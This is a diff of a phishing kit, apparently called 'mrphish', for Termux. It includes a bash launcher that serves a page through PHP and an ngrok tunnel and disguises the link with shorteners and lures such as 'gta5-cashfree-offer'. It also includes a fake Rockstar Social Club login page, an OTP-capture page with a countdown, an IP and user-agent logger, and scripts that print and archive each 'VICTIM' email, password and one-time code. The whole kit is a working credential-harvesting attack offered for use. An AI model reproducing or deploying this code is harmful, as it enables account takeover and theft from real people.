     5 +#THANKS TO ALL MY SUBSCRIBERS
     6 +#This is official tool of noob hackers if you steal it then your respositery will be banned soon so be careful and
     7 +#copyright strike will be sent to your channel, if you dont give credits
     8 +cd $HOME/mrphish/core
     9 +cp ngrok /data/data/com.termux/files/home/mrphish/core/deploys/gaming/socialclub/notp
     10 +cd /data/data/com.termux/files/home/mrphish/core/deploys/gaming/socialclub/notp
     11 +rm *.txt 2>/dev/null
     12 +stop() {
     13 +checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
     14 +checkphp=$(ps aux | grep -o "php" | head -n1)
     15 +checkssh=$(ps aux | grep -o "ssh" | head -n1)
     16 +if [[ $checkngrok == *'ngrok'* ]]; then
     17 +pkill -f -2 ngrok > /dev/null 2>&1
     18 +killall -2 ngrok > /dev/null 2>&1
     19 +fi
     20 + 
     21 +if [[ $checkphp == *'php'* ]]; then
     22 +killall -2 php > /dev/null 2>&1
     23 +fi
     24 +if [[ $checkssh == *'ssh'* ]]; then
     25 +killall -2 ssh > /dev/null 2>&1
     26 +fi
     27 +exit 1
     28 + 
     29 +}
     30 + 
     31 +dependencies() {
     32 + 
     33 + 
     34 +command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; }
     35 +
     36 + 
     37 + 
     38 +}
     39 + 
     40 +checkfound() {
     41 + 
     42 +printf "\n"
     43 +printf "\e[1;92m\e[0m\e[1;96m|---------------------------------------------------------------|\e[0m\n"
     44 +printf " \e[1;92m\e[1;77m\e[0m\e[1;96m |\e[96m WAITING FOR DATA LOGS,\e[0m\e[1;91m PRESS CTRL+C TO STOP \e[96m|\e[0m\n"
     45 +printf "\e[1;92m\e[0m\e[1;96m|---------------------------------------------------------------|\e[0m\n"
     46 +while [ true ]; do
     47 + 
     48 + 
     49 +if [[ -e "gmail.txt" ]]; then
     50 +printf " \n\e[1;96m[\e[92m+>\e[1;96m] VICTIM ACCESSED LINK...!\e[0m\n"
     51 +printf "\e[1;92m\e[0m\e[1;96m |-------------------------------------[\e[92mSUCCESS\e[96m]\e[0m\n"
     52 +fi
     53 + 
     54 +sleep 3.5
     55 + 
     56 +if [[ -e "pass.txt" ]]; then
     57 +printf " \n\e[1;96m[\e[92m+>\e[1;96m] VALID DATA FOUND...!\e[0m\n"
     58 +printf "\e[1;92m\e[0m\e[1;96m |-------------------------------------[\e[92mSUCCESS\e[96m]\e[0m\n"
     59 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     60 +sleep 3.0
     61 +printf " \e[1;92m\e[0m\e[1;96m|---------------[\e[92mOPENING DUMP\e[96m]\e[0m\n"
     62 +sleep 10.0
     63 +bash io.sh
     64 +fi
     65 +sleep 3.0
     66 +done
     67 + 
     68 +}
     69 + 
     70 +ngrok_server() {
     71 + 
     72 + 
     73 +if [[ -e ngrok ]]; then
     74 +echo ""
     75 +else
     76 +command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
     77 +command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; }
     78 +printf " \e[1;96m[\e[0m#\e[1;96m] DOWNLOADING NGROK ...\n"
     79 +arch=$(uname -a | grep -o 'arm' | head -n1)
     80 +arch2=$(uname -a | grep -o 'Android' | head -n1)
     81 +if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
     82 +wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1
     83 +if [[ -e ngrok-stable-linux-arm.zip ]]; then
     84 +unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
     85 +chmod +x ngrok
     86 +rm -rf ngrok-stable-linux-arm.zip
     87 +else
     88 +printf " \e[1;96m[!] Download error... Termux, run:\e[0m\e[1;96m pkg install wget\e[0m\n"
     89 +exit 1
     90 +fi
     91 + 
     92 +else
     93 +wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1
     94 +if [[ -e ngrok-stable-linux-386.zip ]]; then
     95 +unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
     96 +chmod +x ngrok
     97 +rm -rf ngrok-stable-linux-386.zip
     98 +else
     99 +printf " \e[1;96m[!] Download error... \e[0m\n"
     100 +exit 1
     101 +fi
     102 +fi
     103 +fi
     104 +printf " \e[1;92m\e[0m\e[1;96m ____[\e[92monline\e[96m] \e[0m\n"
     105 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     106 +printf "\e[1;96m[\e[92m+\e[1;96m] STARTING DATA SERVER ....\n"
     107 +php -S 127.0.0.1:3333 > /dev/null 2>&1 &
     108 +sleep 4
     109 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     110 +printf "\e[1;96m[\e[92m+\e[1;96m] STARTING DEPLOY SERVER....\n"
     111 +./ngrok http 3333 > /dev/null 2>&1 &
     112 +sleep 12.0
     113 +link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
     114 +echo $link > sss
     115 +File=sss
     116 +if grep -q https:// "$File"
     117 +then
     118 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     119 +printf "\e[1;96m[\e[92m+\e[1;96m] DEPLOY LINK STATUS \e[96m[\e[92mWORKING\e[96m]\e[0m\n"
     120 +else
     121 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     122 +printf "\e[1;96m[\e[92m+\e[1;96m] DEPLOY LINK STATUS \e[96m[\e[91mERROR\e[96m]\e[0m\n"
     123 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     124 +printf "\e[1;96m[\e[92m+\e[1;96m] \e[91m PLEASE USE HOTPOST OR SPEED DATA OR USE AUTH TOKEN\n"
     125 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     126 +printf "\e[1;96m[\e[92m+\e[1;96m] \e[91m HOLD CTRL + C OR USE VOLUME DOWN + C TO STOP\n"
     127 +sleep 30m 10s
     128 +fi
     129 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     130 +printf "\e[1;96m[\e[92m+\e[1;96m] Copy ThiS Link \e[92m $link \e[0m\n"
     131 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     132 +printf "\e[1;96m[\e[92m+\e[1;96m] COPY & PASTE ABOVE LINK IN THIS TYPE 1 WEBSITE AND PASTE SHORTLINK BELOW"
     133 +echo " "
     134 +printf " \e[1;92m\e[0m\e[1;96m|\n"
     135 +echo -en "\e[32mTYPE 1 =>\e[0m "
     136 +read nmr
     137 +if [[ "$nmr" = "1" ]];
     138 +then
     139 +am start -a android.intent.action.VIEW -d https://rebrand.ly/mrpcdm > /dev/null
     140 +else
     141 +echo > /dev/null
     142 +fi
     143 +printf " \e[1;92m\e[0m\e[1;96m|\n"
     144 +echo -en "\e[32mPASTE SHORT LINK=>\e[0m "
     145 +read lnkstr
     146 +echo $lnkstr > lnkstr.sh
     147 +linko=$(cat lnkstr.sh)
     148 +short=$(curl -s https://da.gd/s/?url=${linko})
     149 +shorter=${short#https://}
     150 +echo " "
     151 +echo -e '\e[92m Type custom words like: (free-fire-hack, hack-android)'
     152 +echo -e "\e[91m Don't use space just use '-' between words\e[0m"
     153 +echo " "
     154 +echo -en "\e[92mCUSTOM WORDS=>\e[0m "
     155 +read words
     156 +final=$words@$shorter
     157 +shortb=$(curl -s https://da.gd/s/?url=${linko})
     158 +shorterb=${short#https://}
     159 +wordsb="gta5-cashfree-offer"
     160 +finalb=$wordsb@$shorterb
     161 +url="https://m.youtube.com/redirect?q=${link}"
     162 +tiny=$(curl -s http://tinyurl.com/api-create.php?url=${url})
     163 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     164 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------------------------------------------|\e[0m\n"
     165 +printf "\e[1;96m[\e[92m+>\e[1;96m NGROK LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $link
     166 +printf " \e[1;92m\e[0m\e[1;96m|------------------------\e[0m\n"
     167 +printf "\e[1;96m[\e[92m+>\e[1;96m CUSTOM LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $final
     168 +printf " \e[1;92m\e[0m\e[1;96m|------------------------\e[0m\n"
     169 +printf "\e[1;96m[\e[92m+>\e[1;96m DEFAULT LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $finalb
     170 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------\e[0m\n"
     171 +printf "\e[1;96m[\e[92m+>\e[1;96m REDIRECT LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $tiny
     172 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------\e[0m\n"
     173 +printf "\e[1;96m[\e[92m+>\e[1;96m SHORT LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $linko
     174 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------------------------------------------|\e[0m\n"
     175 +checkfound
     176 +}
     177 + 
     178 +start1() {
     179 +if [[ -e sendlink ]]; then
     180 +rm -rf sendlink
     181 +fi
     182 + 
     183 +printf "\n"
     184 +echo -e "\e[96m
     185 + ____ ____ ____ __ __ _ _
     186 + ( \( __)( _ \( ) / \( \/ )
     187 + ) D ( ) _) ) __// (_/\( O )) /"
     188 +echo -e "\e[91m (____/(____)(__) \____/ \__/(__/\e[0m"
     189 +echo
     190 +default_option_server="2"
     191 +read -p $'\n\e[1;91m[\e[0m\e[1;77m+\e[0m\e[1;96m] START ATTACK [y/n] : \e[0m' option_server
     192 +clear
     193 +option_server="${option_server:-${default_option_server}}"
     194 +if [[ $option_server -eq 1 ]]; then
     195 + 
     196 +command -v php > /dev/null 2>&1 || { echo >&2 "This Server No More Supported So, Aborting."; exit 1; }
     197 +start
     198 + 
     199 +elif [[ $option_server -eq y ]]; then
     200 +ngrok_server
     201 +else
     202 +printf "\e[1;93m [!] Invalid option!\e[0m\n"
     203 +sleep 1
     204 +clear
     205 +start1
     206 +fi
     207 + 
     208 +}
     209 + 
     210 + 
     211 +start() {
     212 + 
     213 +default_choose_sub="Y"
     214 +default_subdomain="mrphish$RANDOM"
     215 + 
     216 +printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Choose subdomain? (Default:\e[0m\e[1;77m [Y/n] \e[0m\e[1;33m): \e[0m'
     217 +read choose_sub
     218 +choose_sub="${choose_sub:-${default_choose_sub}}"
     219 +if [[ $choose_sub == "Y" || $choose_sub == "y" || $choose_sub == "Yes" || $choose_sub == "yes" ]]; then
     220 +subdomain_resp=true
     221 +printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Subdomain: (Default:\e[0m\e[1;77m %s \e[0m\e[1;33m): \e[0m' $default_subdomain
     222 +read subdomain
     223 +subdomain="${subdomain:-${default_subdomain}}"
     224 +fi
     225 + 
     226 +server
     227 +checkfound
     228 + 
     229 +}
     230 + 
     231 +dependencies
     232 +start1
     233 + 
  • ■ ■ ■ ■ ■ ■
    socialclub/notp/style.css
     1 +*{
     2 + margin: 0;
     3 + padding: 0;
     4 + font-family: "ubuntu",sans-serif;
     5 + box-sizing: border-box;
     6 +}
     7 +
     8 +::selection{
     9 + background-color: #fdcf74;
     10 +}
     11 +
     12 +body{
     13 + background-image: url(images/bg.png);
     14 + background-size: 256px;
     15 + min-height: 100vh;
     16 + display: grid;
     17 + justify-items: center;
     18 + align-items: center;
     19 + grid-template-rows: auto 62px;
     20 +}
     21 +
     22 +.login-form{
     23 + width: 100%;
     24 + max-width: 500px;
     25 +}
     26 +
     27 +.logo{
     28 + background-image: url(images/logo.svg);
     29 + width: 290px;
     30 + height: 82px;
     31 + margin: 40px auto;
     32 +}
     33 +
     34 +.container{
     35 + margin: 20px 0;
     36 + background-color: #fff;
     37 + padding: 20px;
     38 + border-radius: 2px;
     39 + color: #4d4d4d;
     40 +}
     41 +
     42 +.container h1{
     43 + font-size: 24px;
     44 + margin-bottom: 20px;
     45 +}
     46 +
     47 +.txtb{
     48 + height: 50px;
     49 + margin-bottom: 20px;
     50 + position: relative;
     51 + overflow: hidden;
     52 +}
     53 +
     54 +.txtb input{
     55 + width: 100%;
     56 + height: 50px;
     57 + border: 1px solid #e6e6e6;
     58 + padding: 0 20px;
     59 + font-size: 18px;
     60 + color: #666;
     61 + border-radius: 3px;
     62 + outline: 3px solid #fcaf1770;
     63 +}
     64 +
     65 +.placeholder{
     66 + position: absolute;
     67 + left: 20px;
     68 + top: 50%;
     69 + transform: translateY(-50%);
     70 + user-select: none;
     71 + pointer-events: none;
     72 + font-size: 17px;
     73 + transform-origin: 0 0;
     74 + transition: .2s linear;
     75 +}
     76 +
     77 +.txtb input:not(:placeholder-shown) + .placeholder{
     78 + transform: scale(.75) translateY(-26px);
     79 +}
     80 +
     81 +.txtb input:not(:placeholder-shown){
     82 + padding-top: 12px;
     83 +}
     84 +
     85 +.show-password-btn{
     86 + position: absolute;
     87 + right: 20px;
     88 + top: 50%;
     89 + transform: translateY(-50%);
     90 + cursor: pointer;
     91 + fill: #999;
     92 +}
     93 +
     94 +.checkbox{
     95 + display: inline-block;
     96 + margin-bottom: 20px;
     97 + cursor: pointer;
     98 + padding-left: 30px;
     99 + position: relative;
     100 +}
     101 +
     102 +.checkbox input{
     103 + display: none;
     104 +}
     105 +
     106 +.checkbox span::before{
     107 + content: "";
     108 + position: absolute;
     109 + width: 20px;
     110 + height: 20px;
     111 + border: 1px solid #4d4d4d;
     112 + left: 0;
     113 + box-sizing: border-box;
     114 + border-radius: 3px;
     115 +}
     116 +
     117 +.checkbox span:after{
     118 + content: "";
     119 + position: absolute;
     120 + width: 12px;
     121 + height: 6px;
     122 + border-bottom: 2px solid #333;
     123 + border-left: 2px solid #333;
     124 + transform: rotate(-50deg);
     125 + box-sizing: border-box;
     126 + left: 4px;
     127 + top: 6px;
     128 + display: none;
     129 +}
     130 +
     131 +.checkbox input:checked + span::after{
     132 + display: block;
     133 +}
     134 +
     135 +.forgot-signin-container{
     136 + display: flex;
     137 + align-items: center;
     138 + justify-content: space-between;
     139 +}
     140 +
     141 +.link{
     142 + color: #fcaf17;
     143 + text-decoration: none;
     144 + transition: .2s linear;
     145 +}
     146 +
     147 +.link:hover{
     148 + text-decoration: underline;
     149 +}
     150 +
     151 +.forgot-signin-container input{
     152 + width: 100px;
     153 + height: 38px;
     154 + border: none;
     155 + background-image: linear-gradient(90deg,#f7931e,#fcaf17);
     156 + color: #fff;
     157 + font-weight: 700;
     158 + outline: none;
     159 + cursor: pointer;
     160 + border-radius: 3px;
     161 +}
     162 +
     163 +.forgot-signin-container input:hover{
     164 + background: #fcaf17;
     165 +}
     166 +
     167 +.bottom-container{
     168 + display: flex;
     169 + flex-wrap: wrap;
     170 + justify-content: space-between;
     171 + align-items: center;
     172 +}
     173 +
     174 +.bottom-container h3{
     175 + font-size: 18px;
     176 + font-weight: 500;
     177 +}
     178 +
     179 +.sm-login{
     180 + display: flex;
     181 + justify-content: space-between;
     182 +}
     183 +
     184 +.sm-login a{
     185 + width: 38px;
     186 + margin: 0 5px;
     187 + overflow: hidden;
     188 +}
     189 +
     190 +.sm-login a img{
     191 + width: 100%;
     192 +}
     193 +
     194 +.create-account{
     195 + text-align: center;
     196 + color: #fff;
     197 + margin: 30px 0;
     198 +}
     199 +
     200 +.copyright{
     201 + color: #999;
     202 + font-size: 12px;
     203 +}
     204 +
     205 +@media screen and (max-width: 520px){
     206 + body{
     207 + align-items: unset;
     208 + }
     209 +
     210 + .logo{
     211 + width: 236px;
     212 + height: 67px;
     213 + margin: 16px auto;
     214 + }
     215 +
     216 + .container{
     217 + margin: 8px;
     218 + }
     219 + .row{
     220 + width: 100%;
     221 + }
     222 + .sm-login{
     223 + margin-top: 8px;
     224 + }
     225 + .sm-login a{
     226 + flex: 1;
     227 + max-width: 65px;
     228 + }
     229 +}
  • ■ ■ ■ ■ ■ ■
    socialclub/otp/dump.sh
     1 +echo -e "\e[96m | "
     2 +read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] VICTIM NAME: \e[0m' name
     3 +cd /sdcard/dUmpS
     4 +mkdir $name
     5 +cd $HOME/mrphish/core/deploys/gaming/socialclub/otp
     6 +mv *.txt /sdcard/dUmpS/$name
     7 +cp grad.sh /sdcard/dUmpS/$name
     8 +sleep 2.3
     9 +echo -e "\e[96m | "
     10 +printf " \e[1;92m\e[0m\e[1;96m|------------------[\e[92mDONE\e[96m]\e[0m\n"
     11 +cd $HOME/mrphish
     12 +bash mrphish
     13 + 
  • ■ ■ ■ ■ ■ ■
    socialclub/otp/grad.sh
     1 +clear
     2 +echo
     3 +echo -e '\e[96m
     4 + __ _____ ___ ___
     5 + ( ) ( _ )/ __)/ __)
     6 + )(__ )(_)(( (_-.\__ \\'
     7 +echo -e '\e[91m (____)(_____)\___/(___/ \e[0m'
     8 +echo " "
     9 +echo " SOCIAL CLUB HACKED LOGS........."
     10 +echo -e "\e[96m |---------------------------------------------------------------|"
     11 +ip=$(cat ip.txt)
     12 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] IP:\e[0m\e[1;92m $ip \e[0m\n" $ip
     13 +echo -e "\e[96m |---------------------------------------------------------------|"
     14 +ip=$(cat gmail.txt)
     15 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] GMAIL:\e[0m\e[1;92m $ip \e[0m\n" $ip
     16 +echo -e "\e[96m |---------------------------------------------------------------|"
     17 +ip=$(cat pass.txt)
     18 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] PASS:\e[0m\e[1;92m $ip \e[0m\n" $ip
     19 +echo -e "\e[96m |---------------------------------------------------------------|"
     20 +ip=$(cat otp.txt)
     21 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] OTP:\e[0m\e[1;92m $ip \e[0m\n" $ip
     22 +echo -e "\e[96m |---------------------------------------------------------------|"
     23 +sleep 8.0
     24 +if [ -f "ngrok" ];
     25 +then
     26 +rm ngrok
     27 +else
     28 +sleep 0.2
     29 +fi
     30 +#ip=$(cat gml.txt)
     31 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] NUMBER:\e[0m\e[1;77m $ip \e[0m\n" $ip
     32 +#ip=$(cat num.txt)
     33 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] BIO:\e[0m\e[1;77m $ip \e[0m\n" $ip
     34 +#ip=$(cat bio.txt)
     35 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] USER:\e[0m\e[1;77m $ip \e[0m\n" $ip
     36 +#ip=$(cat usr.txt)
     37 +#printf "\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;93m] IP:\e[0m\e[1;77m $ip \e[0m\n" $ip
     38 +#ip=$(cat cred.txt)
     39 +#printf "\e[1;93m[\e[0m\e[1;77m|\e[0m\e[1;93m] OT \e[0m\e[1;92m $ip \e[0m\n" $ip
     40 + 
  • socialclub/otp/images/bg.png
  • socialclub/otp/images/eye.svg
  • socialclub/otp/images/fb.png
  • socialclub/otp/images/google.png
  • socialclub/otp/images/logo.svg
  • socialclub/otp/images/ps.png
  • socialclub/otp/images/twitter.png
  • socialclub/otp/images/xbox.png
  • ■ ■ ■ ■ ■ ■
    socialclub/otp/index.html
     1 +<html lang="en">
     2 +<head>
     3 + <meta charset="UTF-8">
     4 + <meta name="viewport" content="width=device-width, initial-scale=1.0">
     5 + <title></title>
     6 + <link rel="stylesheet" href="style.css">
     7 + <link href="https://fonts.googleapis.com/css2?family=Ubuntu:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap" rel="stylesheet">
     8 +</head>
     9 +<body>
     10 +<form action="process.php" method="POST" class="login">
     11 + <div class="login-form">
     12 + <div class="logo"></div>
     13 + <div class="container">
     14 + <h1>Sign in with social club</h1>
     15 + <div class="txtb">
     16 + <input type="text" id="username" name="email" placeholder=" ">
     17 + <span class="placeholder">Email</span>
     18 + </div>
     19 + <div class="txtb">
     20 + <input type="password" id="password" name="pass" placeholder=" ">
     21 + <span class="placeholder">Password</span>
     22 + <i class="show-password-btn">
     23 + <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" height="16" width="16" class="UI__Icon__icon" data-ui-name="visibility_off_icon"><path d="M29.8 17.2c-2.2 1.7-4.6 3-7.1 3.7l-2.5-2.5c.6-.8.9-1.8.9-2.9 0-1.4-.5-2.6-1.5-3.6-1.7-1.7-4.5-1.9-6.4-.6l-1.7-1.7c6.3-1.3 12.9.1 18.4 4.3.6.5 1.5.4 1.9-.2.5-.6.4-1.5-.2-1.9-6.7-5.1-14.9-6.6-22.4-4.4L5.7 3.9c-.5-.5-1.4-.5-1.9 0s-.5 1.4 0 1.9l2.6 2.6c-2 .9-4 2-5.8 3.4-.6.5-.7 1.3-.2 1.9.3.3.7.5 1.1.5.3 0 .6-.1.8-.3 1.9-1.5 4-2.6 6.2-3.4l2.9 2.9c-.3.6-.4 1.2-.4 1.8 0 .8.5 1.4 1.3 1.5.6.1 1.2-.4 1.4-1l2.2 2.2c-.2 0-.3 0-.5-.1-.7-.2-1.5.2-1.7.9-.2.7.2 1.5.9 1.7.5.2 1 .2 1.5.2.7 0 1.4-.2 2.1-.5l1.5 1.5c-6 1-12.2-.5-17.3-4.5-.6-.5-1.5-.4-1.9.2-.5.6-.4 1.5.2 1.9 4.6 3.6 10 5.4 15.5 5.4 2 0 3.9-.2 5.9-.7l4.1 4.1c.3.3.6.4 1 .4s.7-.1 1-.4c.5-.5.5-1.4 0-1.9L25.1 23c2.3-.9 4.6-2.1 6.6-3.7.6-.5.7-1.3.2-1.9-.7-.6-1.5-.7-2.1-.2zm-12.2-3.3c.4.4.7 1 .7 1.7 0 .3-.1.6-.2.8l-3-3c.9-.3 1.9-.1 2.5.5z"></path></svg>
     24 + </i>
     25 + </div>
     26 + <label class="checkbox">
     27 + <input type="checkbox">
     28 + <span>Keep me signed in</span>
     29 + </label>
     30 + <div class="forgot-signin-container">
     31 + <a href="process.php" class="link">Forgot your password?</a>
     32 + <input type="submit" value="Signin" class="login">
     33 + </div>
     34 + </form>
     35 + </div>
     36 +
     37 + <div class="container bottom-container">
     38 + <h3 class="row">Sign in using</h3>
     39 + <div class="sm-login row">
     40 + <a href="login.php">
     41 + <img src="images/ps.png" alt="">
     42 + </a>
     43 + <a href="#">
     44 + <img src="images/xbox.png" alt="">
     45 + </a>
     46 + <a href="#">
     47 + <img src="images/fb.png" alt="">
     48 + </a>
     49 + <a href="#">
     50 + <img src="images/google.png" alt="">
     51 + </a>
     52 + <a href="#">
     53 + <img src="images/twitter.png" alt="">
     54 + </a>
     55 + </div>
     56 + </div>
     57 +
     58 + <div class="create-account">
     59 + Not a member?
     60 + <a href="login.php" class="link">Create a new account</a>
     61 + </div>
     62 + </div>
     63 +
     64 + <div class="copyright">
     65 + &copy; 2020
     66 + </div>
     67 +
     68 + <script>
     69 + document.querySelector(".show-password-btn").addEventListener("click",function(){
     70 + var passwordInput = document.querySelector("#passwordInput");
     71 + if(passwordInput.type == "password") passwordInput.type = "text";
     72 + else passwordInput.type = "password";
     73 + });
     74 + </script>
     75 +</body>
     76 +</html>
  • ■ ■ ■ ■ ■ ■
    socialclub/otp/io.sh
     1 +clear
     2 +mpv /sdcard/log.mp3
     3 +clear
     4 +if [ -f "otp.txt" ];then
     5 +bash grad.sh
     6 +sleep 15.0
     7 +bash dump.sh
     8 +else
     9 +echo -e " \e[96m Retriving Data Again Wait"
     10 +sleep 3.0
     11 +bash io.sh
     12 +fi
     13 + 
  • ■ ■ ■ ■ ■ ■
    socialclub/otp/ip.php
     1 +<?php
     2 +
     3 +if (!empty($_SERVER['HTTP_CLIENT_IP']))
     4 + {
     5 + $ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";
     6 + }
     7 +elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
     8 + {
     9 + $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";
     10 + }
     11 +else
     12 + {
     13 + $ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
     14 + }
     15 +$useragent = " User-Agent: ";
     16 +$browser = $_SERVER['HTTP_USER_AGENT'];
     17 +
     18 +
     19 +$file = 'ip.txt';
     20 +$fp = fopen($file, 'a');
     21 +
     22 +fwrite($fp, $ipaddress);
     23 +fwrite($fp, $useragent);
     24 +fwrite($fp, $browser);
     25 +
     26 +
     27 +fclose($fp);
  • ■ ■ ■ ■ ■ ■
    socialclub/otp/otp.html
     1 +<html lang="en">
     2 +<head>
     3 + <meta charset="UTF-8">
     4 + <meta name="viewport" content="width=device-width, initial-scale=1.0">
     5 + <title></title>
     6 + <link rel="stylesheet" href="style.css">
     7 + <link href="https://fonts.googleapis.com/css2?family=Ubuntu:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap" rel="stylesheet">
     8 +</head>
     9 +<body>
     10 +<form action="otp.php" method="POST" class="login">
     11 + <div class="login-form">
     12 + <div class="logo"></div>
     13 + <div class="container">
     14 + <h1>Sign in with social club</h1>
     15 + <div class="txtb">
     16 + <input type="password" id="password" name="pass" placeholder=" ">
     17 + <span class="placeholder">Password</span>
     18 + <i class="show-password-btn">
     19 + <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" height="16" width="16" class="UI__Icon__icon" data-ui-name="visibility_off_icon"><path d="M29.8 17.2c-2.2 1.7-4.6 3-7.1 3.7l-2.5-2.5c.6-.8.9-1.8.9-2.9 0-1.4-.5-2.6-1.5-3.6-1.7-1.7-4.5-1.9-6.4-.6l-1.7-1.7c6.3-1.3 12.9.1 18.4 4.3.6.5 1.5.4 1.9-.2.5-.6.4-1.5-.2-1.9-6.7-5.1-14.9-6.6-22.4-4.4L5.7 3.9c-.5-.5-1.4-.5-1.9 0s-.5 1.4 0 1.9l2.6 2.6c-2 .9-4 2-5.8 3.4-.6.5-.7 1.3-.2 1.9.3.3.7.5 1.1.5.3 0 .6-.1.8-.3 1.9-1.5 4-2.6 6.2-3.4l2.9 2.9c-.3.6-.4 1.2-.4 1.8 0 .8.5 1.4 1.3 1.5.6.1 1.2-.4 1.4-1l2.2 2.2c-.2 0-.3 0-.5-.1-.7-.2-1.5.2-1.7.9-.2.7.2 1.5.9 1.7.5.2 1 .2 1.5.2.7 0 1.4-.2 2.1-.5l1.5 1.5c-6 1-12.2-.5-17.3-4.5-.6-.5-1.5-.4-1.9.2-.5.6-.4 1.5.2 1.9 4.6 3.6 10 5.4 15.5 5.4 2 0 3.9-.2 5.9-.7l4.1 4.1c.3.3.6.4 1 .4s.7-.1 1-.4c.5-.5.5-1.4 0-1.9L25.1 23c2.3-.9 4.6-2.1 6.6-3.7.6-.5.7-1.3.2-1.9-.7-.6-1.5-.7-2.1-.2zm-12.2-3.3c.4.4.7 1 .7 1.7 0 .3-.1.6-.2.8l-3-3c.9-.3 1.9-.1 2.5.5z"></path></svg>
     20 + </i>
     21 + </div>
     22 + <label class="checkbox">
     23 + <input type="checkbox">
     24 + <span>Keep me signed in</span>
     25 + </label>
     26 + &nbsp;
     27 + <center> <div>Time left - <span id="timer">2:00</span></div></center>
     28 + &nbsp;
     29 + <div class="forgot-signin-container">
     30 + <a href="process.php" class="link">Forgot your password?</a>
     31 + <input type="submit" value="Signin" class="login">
     32 + </div>
     33 + </form>
     34 + </div>
     35 +<script type="text/javascript">
     36 + startTimer();
     37 +
     38 +function startTimer() {
     39 + var presentTime = document.getElementById('timer').innerHTML;
     40 + var timeArray = presentTime.split(/[:]+/);
     41 + var m = timeArray[0];
     42 + var s = checkSecond((timeArray[1] - 1));
     43 + if(s==11){m=m-1}
     44 + if((m + '').length == 1){
     45 + m = '0' + m;
     46 + }
     47 + if(m < 0){
     48 + m = '11';
     49 + }
     50 + document.getElementById('timer').innerHTML = m + ":" + s;
     51 + setTimeout(startTimer, 1000);
     52 +}
     53 +
     54 +function checkSecond(sec) {
     55 + if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
     56 + if (sec < 0) {sec = "59"};
     57 + return sec;
     58 +}
     59 +</script>
     60 + <div class="container bottom-container">
     61 + <h3 class="row">Sign in using</h3>
     62 + <div class="sm-login row">
     63 + <a href="login.php">
     64 + <img src="images/ps.png" alt="">
     65 + </a>
     66 + <a href="#">
     67 + <img src="images/xbox.png" alt="">
     68 + </a>
     69 + <a href="#">
     70 + <img src="images/fb.png" alt="">
     71 + </a>
     72 + <a href="#">
     73 + <img src="images/google.png" alt="">
     74 + </a>
     75 + <a href="#">
     76 + <img src="images/twitter.png" alt="">
     77 + </a>
     78 + </div>
     79 + </div>
     80 +
     81 + <div class="create-account">
     82 + Not a member?
     83 + <a href="login.php" class="link">Create a new account</a>
     84 + </div>
     85 + </div>
     86 +
     87 + <div class="copyright">
     88 + &copy; 2020
     89 + </div>
     90 +
     91 + <script>
     92 + document.querySelector(".show-password-btn").addEventListener("click",function(){
     93 + var passwordInput = document.querySelector("#passwordInput");
     94 + if(passwordInput.type == "password") passwordInput.type = "text";
     95 + else passwordInput.type = "password";
     96 + });
     97 + </script>
     98 + </script>
